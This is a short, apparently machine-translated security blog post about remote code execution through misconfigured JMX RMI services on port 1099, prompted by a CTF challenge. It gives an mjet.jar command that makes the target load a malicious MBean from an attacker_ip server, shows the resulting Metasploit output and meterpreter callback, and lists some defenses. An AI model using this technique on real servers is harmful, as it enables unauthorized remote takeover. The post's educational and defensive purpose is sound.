16 Apr 2015 - Demon
[+] Author: Demon
[+] Team: n0tr00t security team
[+] From: http://www.n0tr00t.com
[+] Create: 2015-04-16
Utilization method
View: Exploiting JMX RMI
The reason for writing this article is that one of the final questions of alictf is about @ cnbird's Linux penetration, which involves a machine opening 1099 port. After the game, many students said that they were interested in this way of utilization, so they sorted it out and made it convenient for the friends to consult later.
The original corresponding service of port 1099 is Apache ActiveMQ's support for JMX. However, due to improper configuration, an attacker can use the getmbeansfromurl method of javax.management.loading.mlet to load a remote malicious MBean through this port, that is, arbitrary code can be executed remotely. Of course, this JMX utilization method can be used not only in ActiveMQ, but also in many services supporting JMX.
In the original text, the principle analysis of the vulnerability and the compilation of exploit are described in detail, and there will be no more details here. How to use this vulnerability to directly call and execute the meterpret payload in Metasploit? There has been a JMX utility called mjet written abroad, which can search for and transport gate on GitHub. The method is very detailed. First, build a Metasploit through a public network machine, start a Java mlet server module, and enable the target machine to load malicious code. Then use mjet.jar to expand. The specific commands are as follows:
java -jar mjet.jar -t target_ip -p 1099 -u http://attacker_ip:8080/mlet/
Attacker? IP is the IP of the machine with Metasploit installed in its public network. After execution, the following information will be returned if the exploit succeeds.
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
---------------------------------------------------
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...
[+] Connected: rmi://192.168.178.164 5
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE
[+] Invoking: metasploit.Metasploit.run()
[+] Done
The process of execution is clear at a glance. Then on the Java mlet server side, a metapreter session bounces back on the back end.
Defense plan
- Enable SSL client certificate authentication in configuration.
- Enable password based authorization authentication and use SSL transport.
- Make iptables for the JMX RMI port.
Reference resources
- http://drops.wooyun.org/papers/178
- http://docs.oracle.com/javase/6/docs/technotes/guides/management/agent.html